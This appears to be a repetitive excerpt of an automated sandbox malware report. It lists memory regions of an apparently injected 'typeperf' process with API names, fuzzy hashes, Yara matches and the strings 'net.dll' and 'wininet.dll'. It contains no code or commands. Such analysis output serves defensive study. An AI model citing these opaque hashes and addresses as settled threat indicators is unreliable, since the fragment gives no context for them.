                                                                                                                   • Associated: 0000000C.00000002.3738573348.000000000322D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.3738573348.000000000329E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_3100000_typeperf.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: 312dd022fafde603784f4c1b8b24aaf897b67fbeb57bb2c8ec62f4dd96ee6afb
                                                                                                                  • Instruction ID: 3f2e3322127b40667e86dd57f903944c991eff87cf0bbe452cd1680972d53015
                                                                                                                  • Opcode Fuzzy Hash: 312dd022fafde603784f4c1b8b24aaf897b67fbeb57bb2c8ec62f4dd96ee6afb
                                                                                                                  • Instruction Fuzzy Hash: B590023160550803D100B2584654746100687D4301FA5D411A042556CD87958A5169A6
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.3738573348.0000000003100000.00000040.00001000.00020000.00000000.sdmp, Offset: 03100000, based on PE: true
                                                                                                                   • Associated: 0000000C.00000002.3738573348.0000000003229000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.3738573348.000000000322D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.3738573348.000000000329E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_3100000_typeperf.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: d674fd4d7c218e0e334bd12d115238c3606a803392f0846dfc3979393b4fa059
                                                                                                                  • Instruction ID: 75acb95e11ec39715f878f1e43c15ee527e7b0a87199a0673d7cb0378bc1214d
                                                                                                                  • Opcode Fuzzy Hash: d674fd4d7c218e0e334bd12d115238c3606a803392f0846dfc3979393b4fa059
                                                                                                                  • Instruction Fuzzy Hash: D1900261202404034105B2584554656400B87E4301B95D021E1015594DC72589916529
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.3738573348.0000000003100000.00000040.00001000.00020000.00000000.sdmp, Offset: 03100000, based on PE: true
                                                                                                                   • Associated: 0000000C.00000002.3738573348.0000000003229000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.3738573348.000000000322D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.3738573348.000000000329E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_3100000_typeperf.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: 900d543cb7f82b1b150f1c7cb37b6656eae25e934334139b1d734c0fc49801b5
                                                                                                                  • Instruction ID: 8a2d46a7028e914073a18995b59bab3b48caf53797f0cf6acedcd7823da70d2d
                                                                                                                  • Opcode Fuzzy Hash: 900d543cb7f82b1b150f1c7cb37b6656eae25e934334139b1d734c0fc49801b5
                                                                                                                  • Instruction Fuzzy Hash: A390023160540C03D150B2584554786000687D4301F95D011A0025658D87558B557AA5
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.3738573348.0000000003100000.00000040.00001000.00020000.00000000.sdmp, Offset: 03100000, based on PE: true
                                                                                                                   • Associated: 0000000C.00000002.3738573348.0000000003229000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.3738573348.000000000322D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.3738573348.000000000329E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_3100000_typeperf.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: 7c4057369484e4de1f8f12cacae58db70f6f6c3ee960b2b0dc48a840c966d5a0
                                                                                                                  • Instruction ID: f966a18a9b4d118a44305fe7e98f0b150149f304e975bee7aa84a98016834f27
                                                                                                                  • Opcode Fuzzy Hash: 7c4057369484e4de1f8f12cacae58db70f6f6c3ee960b2b0dc48a840c966d5a0
                                                                                                                  • Instruction Fuzzy Hash: 3A90023120140C03D180B258454468A000687D5301FD5D015A0026658DCB158B597BA5
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.3738573348.0000000003100000.00000040.00001000.00020000.00000000.sdmp, Offset: 03100000, based on PE: true
                                                                                                                   • Associated: 0000000C.00000002.3738573348.0000000003229000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.3738573348.000000000322D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.3738573348.000000000329E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_3100000_typeperf.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: 51682210cb305b6c406f3345b537fd3b7db5f38f8c85237363aefd66b7e599e3
                                                                                                                  • Instruction ID: 22fbf2272ad860c407ad87415b7fe98c93a195f569787cbd0b6a75eb7d1f720c
                                                                                                                  • Opcode Fuzzy Hash: 51682210cb305b6c406f3345b537fd3b7db5f38f8c85237363aefd66b7e599e3
                                                                                                                  • Instruction Fuzzy Hash: 2790023120544C43D140B2584544A86001687D4305F95D011A0065698D97258E55BA65
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.3738573348.0000000003100000.00000040.00001000.00020000.00000000.sdmp, Offset: 03100000, based on PE: true
                                                                                                                   • Associated: 0000000C.00000002.3738573348.0000000003229000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.3738573348.000000000322D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.3738573348.000000000329E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_3100000_typeperf.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: 792451838e1cf94117a3484312ae5b87f2c7cc53888052c8d4d43603a3100053
                                                                                                                  • Instruction ID: c50fb5e4f2a364241434637cd08a22af322e1971c9ead9f9990e0315be771a17
                                                                                                                  • Opcode Fuzzy Hash: 792451838e1cf94117a3484312ae5b87f2c7cc53888052c8d4d43603a3100053
                                                                                                                  • Instruction Fuzzy Hash: 23900435311404030105F75C07445470047C7DD3513D5D031F1017554CD731CD715535
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.3738573348.0000000003100000.00000040.00001000.00020000.00000000.sdmp, Offset: 03100000, based on PE: true
                                                                                                                   • Associated: 0000000C.00000002.3738573348.0000000003229000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.3738573348.000000000322D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.3738573348.000000000329E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_3100000_typeperf.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: 34b092d6bea5ba95e8feaaef6ba9b58fa43d52e83d1917b7dfb626e95a8a909b
                                                                                                                  • Instruction ID: 06ced77af00cf33740033a1a778df5749af3a3f9c46fdf0b984e672c6f91faf3
                                                                                                                  • Opcode Fuzzy Hash: 34b092d6bea5ba95e8feaaef6ba9b58fa43d52e83d1917b7dfb626e95a8a909b
                                                                                                                  • Instruction Fuzzy Hash: EC900225221404030145F658074454B044697DA3513D5D015F1417594CC72189655725
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.3738573348.0000000003100000.00000040.00001000.00020000.00000000.sdmp, Offset: 03100000, based on PE: true
                                                                                                                   • Associated: 0000000C.00000002.3738573348.0000000003229000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.3738573348.000000000322D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.3738573348.000000000329E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_3100000_typeperf.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: b24d058ab5906c04967d2143fdbdfa22a734111ba97eb3eb144186eaf81885f9
                                                                                                                  • Instruction ID: 58adfac8380c1fc0d21cd7130be18f3159453e4ddbe93a951efe0c43b592cbd4
                                                                                                                  • Opcode Fuzzy Hash: b24d058ab5906c04967d2143fdbdfa22a734111ba97eb3eb144186eaf81885f9
                                                                                                                  • Instruction Fuzzy Hash: 0590022124545503D150B25C45446564006A7E4301F95D021A0815598D875589556625
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.3738573348.0000000003100000.00000040.00001000.00020000.00000000.sdmp, Offset: 03100000, based on PE: true
                                                                                                                   • Associated: 0000000C.00000002.3738573348.0000000003229000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.3738573348.000000000322D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.3738573348.000000000329E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_3100000_typeperf.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: 328d06d4a5794df2f81955634f004892fec64849502d97c8fa717023d23b4a74
                                                                                                                  • Instruction ID: ac14ebe779e06848e3294b198834cfa2483faf11a128593f40fdb565928934df
                                                                                                                  • Opcode Fuzzy Hash: 328d06d4a5794df2f81955634f004892fec64849502d97c8fa717023d23b4a74
                                                                                                                  • Instruction Fuzzy Hash: 4C90026134140843D100B2584554B460006C7E5301F95D015E1065558D8719CD52652A
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.3738573348.0000000003100000.00000040.00001000.00020000.00000000.sdmp, Offset: 03100000, based on PE: true
                                                                                                                   • Associated: 0000000C.00000002.3738573348.0000000003229000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.3738573348.000000000322D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.3738573348.000000000329E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_3100000_typeperf.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: e3199e7b693647bf03e02bd998568518826220270779e73ed9e58b62ba66e0bb
                                                                                                                  • Instruction ID: 5be25e599ea65834172b12cd25718938ae215fae8dd2874911200cc7b2cf4dba
                                                                                                                  • Opcode Fuzzy Hash: e3199e7b693647bf03e02bd998568518826220270779e73ed9e58b62ba66e0bb
                                                                                                                  • Instruction Fuzzy Hash: DD900221601404434140B26889849464006ABE5311795D121A0999554D875989655A69
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.3738573348.0000000003100000.00000040.00001000.00020000.00000000.sdmp, Offset: 03100000, based on PE: true
                                                                                                                   • Associated: 0000000C.00000002.3738573348.0000000003229000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.3738573348.000000000322D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.3738573348.000000000329E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_3100000_typeperf.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: a8f161b6fe2719e639f8bdcffd58be774ce4b1b9876025f92453c1285e48ecfa
                                                                                                                  • Instruction ID: 317124faf7c6bb66ac37dbaa8c0448393c48dd19682fd1ad9308c9b379c194d9
                                                                                                                  • Opcode Fuzzy Hash: a8f161b6fe2719e639f8bdcffd58be774ce4b1b9876025f92453c1285e48ecfa
                                                                                                                  • Instruction Fuzzy Hash: 76900221211C0443D200B6684D54B47000687D4303F95D115A0155558CCB1589615925
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.3738573348.0000000003100000.00000040.00001000.00020000.00000000.sdmp, Offset: 03100000, based on PE: true
                                                                                                                   • Associated: 0000000C.00000002.3738573348.0000000003229000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.3738573348.000000000322D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.3738573348.000000000329E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_3100000_typeperf.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: 339efbcc9b33b5129d39cbea1fe63239abaad39cb055c11030e919f7a22fd794
                                                                                                                  • Instruction ID: 7d0862cb9eb7bcdf457c2561c44fc3560091dd64f13a2f0187523fc47f8ea87c
                                                                                                                  • Opcode Fuzzy Hash: 339efbcc9b33b5129d39cbea1fe63239abaad39cb055c11030e919f7a22fd794
                                                                                                                  • Instruction Fuzzy Hash: 5E90022160140903D101B2584544656000B87D4341FD5D022A1025559ECB258A92A535
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.3738573348.0000000003100000.00000040.00001000.00020000.00000000.sdmp, Offset: 03100000, based on PE: true
                                                                                                                   • Associated: 0000000C.00000002.3738573348.0000000003229000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.3738573348.000000000322D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.3738573348.000000000329E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_3100000_typeperf.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: 72fd9ea41f458e50b48c5faf813552a67e4c3d27be5a84b121be2e3f19e260d8
                                                                                                                  • Instruction ID: bf46b24202cb8de510ba35fd9d9a0e8d9bee7f074528e675bcec39e4703959ae
                                                                                                                  • Opcode Fuzzy Hash: 72fd9ea41f458e50b48c5faf813552a67e4c3d27be5a84b121be2e3f19e260d8
                                                                                                                  • Instruction Fuzzy Hash: 0690026120180803D140B6584944647000687D4302F95D011A2065559E8B298D516539
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.3738573348.0000000003100000.00000040.00001000.00020000.00000000.sdmp, Offset: 03100000, based on PE: true
                                                                                                                   • Associated: 0000000C.00000002.3738573348.0000000003229000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.3738573348.000000000322D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.3738573348.000000000329E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_3100000_typeperf.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: 77bdebb85332028e6eee891b6f9f62daac72f8fb9bafdb82007aad1dcbf4bd51
                                                                                                                  • Instruction ID: 891088f1456512b52e3f913de895b023e1139df5276c8238690c2d91b458f47e
                                                                                                                  • Opcode Fuzzy Hash: 77bdebb85332028e6eee891b6f9f62daac72f8fb9bafdb82007aad1dcbf4bd51
                                                                                                                  • Instruction Fuzzy Hash: 2390022921340403D180B258554864A000687D5302FD5E415A001655CCCB1589695725
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.3738573348.0000000003100000.00000040.00001000.00020000.00000000.sdmp, Offset: 03100000, based on PE: true
                                                                                                                   • Associated: 0000000C.00000002.3738573348.0000000003229000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.3738573348.000000000322D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.3738573348.000000000329E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_3100000_typeperf.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: 2a51b51da322da2e14b288200154d258d754418313bd7453a9f6bf95ad18bf46
                                                                                                                  • Instruction ID: e7487840678c2fc6d0dcbd049a63646909ff69f64783dda83fe6741d83765150
                                                                                                                  • Opcode Fuzzy Hash: 2a51b51da322da2e14b288200154d258d754418313bd7453a9f6bf95ad18bf46
                                                                                                                  • Instruction Fuzzy Hash: D490022130140403D140B25855586464006D7E5301F95E011E0415558CDB1589565626
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.3738573348.0000000003100000.00000040.00001000.00020000.00000000.sdmp, Offset: 03100000, based on PE: true
                                                                                                                   • Associated: 0000000C.00000002.3738573348.0000000003229000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.3738573348.000000000322D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.3738573348.000000000329E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_3100000_typeperf.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: 59127d61b1ddc033cc3019e63de0c80666f7077febf0b2001525a91ed12658a1
                                                                                                                  • Instruction ID: a14d6ab12e128f62756c256071bc98b4a2654ebca555effb60e48ec94d35d512
                                                                                                                  • Opcode Fuzzy Hash: 59127d61b1ddc033cc3019e63de0c80666f7077febf0b2001525a91ed12658a1
                                                                                                                  • Instruction Fuzzy Hash: F9900221242445535545F2584544547400797E43417D5D012A1415954C87269956DA25
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.3738573348.0000000003100000.00000040.00001000.00020000.00000000.sdmp, Offset: 03100000, based on PE: true
                                                                                                                   • Associated: 0000000C.00000002.3738573348.0000000003229000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.3738573348.000000000322D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.3738573348.000000000329E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_3100000_typeperf.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
APIs: (none)
Memory Dump Source
• Source File: 0000000C.00000002.3738573348.0000000003100000.00000040.00001000.00020000.00000000.sdmp, Offset: 03100000, based on PE: true
• Associated: 0000000C.00000002.3738573348.0000000003229000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3738573348.000000000322D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3738573348.000000000329E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_3100000_typeperf.jbxd
Similarity
• API ID: InitializeThunk
• String ID: (none)
• API String ID: 2994545307-0
APIs: (none)
Memory Dump Source
• Source File: 0000000C.00000002.3738573348.0000000003100000.00000040.00001000.00020000.00000000.sdmp, Offset: 03100000, based on PE: true
• Associated: 0000000C.00000002.3738573348.0000000003229000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3738573348.000000000322D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3738573348.000000000329E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_3100000_typeperf.jbxd
Similarity
• API ID: InitializeThunk
• String ID: (none)
• API String ID: 2994545307-0
APIs: (none)
Memory Dump Source
• Source File: 0000000C.00000002.3738573348.0000000003100000.00000040.00001000.00020000.00000000.sdmp, Offset: 03100000, based on PE: true
• Associated: 0000000C.00000002.3738573348.0000000003229000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3738573348.000000000322D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3738573348.000000000329E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_3100000_typeperf.jbxd
Similarity
• API ID: InitializeThunk
• String ID: (none)
• API String ID: 2994545307-0
APIs
• Sleep.KERNELBASE(000007D0), ref: 005D3A3D
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3725825178.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_5b0000_typeperf.jbxd
Yara matches
Similarity
• API ID: Sleep
• String ID: net.dll$wininet.dll
• API String ID: 3472027048-1269752229
APIs
• Sleep.KERNELBASE(000007D0), ref: 005D3A3D
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3725825178.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_5b0000_typeperf.jbxd
Yara matches
Similarity
• API ID: Sleep
• String ID: net.dll$wininet.dll
• API String ID: 3472027048-1269752229
APIs
• Sleep.KERNELBASE(000007D0), ref: 005D3A3D
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3725825178.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_5b0000_typeperf.jbxd
Yara matches
Similarity
• API ID: Sleep
• String ID: net.dll$wininet.dll
• API String ID: 3472027048-1269752229
APIs
• Sleep.KERNELBASE(000007D0), ref: 005D3A3D
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3725825178.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_5b0000_typeperf.jbxd
Yara matches
Similarity
• API ID: Sleep
• String ID: net.dll$wininet.dll
• API String ID: 3472027048-1269752229
APIs
• CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 005B9A32
Memory Dump Source
• Source File: 0000000C.00000002.3725825178.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_5b0000_typeperf.jbxd
Yara matches
Similarity
• API ID: CreateThread
• String ID: (none)
• API String ID: 2422867632-0
APIs
• SetErrorMode.KERNELBASE(00008003,?,?,005C1C30,005D7E8E,NU],005C1BF7), ref: 005C8070
Memory Dump Source
• Source File: 0000000C.00000002.3725825178.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_5b0000_typeperf.jbxd
Yara matches
Similarity
• API ID: ErrorMode
• String ID: (none)
• API String ID: 2340568224-0
APIs: (none)
Memory Dump Source
• Source File: 0000000C.00000002.3738573348.0000000003100000.00000040.00001000.00020000.00000000.sdmp, Offset: 03100000, based on PE: true
• Associated: 0000000C.00000002.3738573348.0000000003229000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3738573348.000000000322D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3738573348.000000000329E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_3100000_typeperf.jbxd
Similarity
• API ID: InitializeThunk
• String ID: (none)
• API String ID: 2994545307-0